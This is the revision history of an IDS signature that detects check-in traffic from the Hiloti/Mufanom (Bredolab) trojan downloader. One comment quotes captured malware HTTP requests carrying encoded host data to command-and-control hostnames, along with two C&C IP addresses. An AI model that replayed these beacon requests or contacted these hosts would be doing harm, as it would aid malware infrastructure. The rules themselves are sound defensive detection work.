alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; flowbits:set,ET.Hiloti; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; classtype:trojan-activity; sid:2010071; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Added 2017-08-07 21:03:11 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; classtype:trojan-activity; sid:2010071; rev:7;)

Added 2011-10-12 19:28:54 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; sid:2010071; rev:7;)

Added 2011-09-14 22:42:10 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; sid:2010071; rev:7;)

Added 2011-02-04 17:29:31 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:5;)

Added 2010-02-08 10:55:54 UTC

The C&C hostnames seen in the captured requests below resolve to these addresses:

78.41.206.236 94.75.221.72

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6B6B6C6D56545445140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9FCFCDCBC2C6F7C1CBC5C5CACFC19EDCD7D7DDD6D7DBD7DDDDDECF93DDD0ADE7878C96 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161007da0206.kathell.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B646A6E6E52575745140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161007da0218.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6A646B6D6A57525645140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 191007da020a.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A69656E6E6952595345140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 221007da0208.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6D6B6856555245140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7BDD9D2CC HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141707da020a.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6D686B56565345140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9FCFCDCBC2C6F7C1CBC5C5CACFC19EDCD7D7DDD6D7DBD7DDDDDECF93DDD0ADE7878C96 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141707da020a.kathell.com
Cache-Control: no-cache

GET /feed.php?ref=http:%2F%2Fwww.bing.com%2Fsearch%3Fq=christopher+and+banks%26form=MSNH14%26qs=AS&ip=75.52.157.550&txt=1 HTTP/1.1
Authorization: Basic 26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B686A6A6952525645140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3D3D8CA
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: u4od.gabverse.net
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6B6A6C6F57575745140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161707da0212.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6A6B6B6B6A53545B45140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 191707da0203.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A696865686757515145140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 211707da0203.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6F6D6652575745140C025A580A585F4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7BDD9D2CC HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141807da020c.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6F6A6A56595545140C025A580A585F4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9FCFCDCBC2C6F7C1CBC5C5CACFC19EDCD7D7DDD6D7DBD7DDDDDECF93DDD0ADE7878C96 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141807da020c.kathell.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6B68696B58545B45140C025A580A585F4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161807da020f.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6D686D56515B45140C025A58510B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9F85E1EAF4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 171807da0213.kathell.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6A6D6C6652585445140C025A58510B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 181807da023b.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6A6F696D6E52515145140C025A58510B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 211807da0202.pereet.com
Cache-Control: no-cache

-- JackPepper - 19 Feb 2010


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:5;)

Added 2010-02-08 10:55:54 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; sid:2010071; rev:4;)

Added 2010-02-08 10:47:13 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; sid:2010071; rev:4;)

Added 2010-02-08 10:47:13 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Infection Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:3;)

Added 2010-02-05 09:31:11 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Infection Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:3;)

Added 2010-02-05 09:31:11 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Infection - checkin"; flow:established,to_server; uricontent:"/get.php?"; nocase; uricontent:"c="; nocase; uricontent:"&d="; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:2;)

Added 2009-10-12 20:45:37 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Infection - checkin"; flow:established,to_server; uricontent:"/get.php?"; nocase; uricontent:"c="; nocase; uricontent:"&d="; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:2;)

Added 2009-10-12 20:45:37 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Infection - checkin"; flow:established,to_server; uricontent:"/get.php?"; nocase; uricontent:"c="; nocase; uricontent:"&d="; nocase; classtype:trojan-activity; sid:2010071; rev:1;)

Added 2009-10-09 08:15:38 UTC

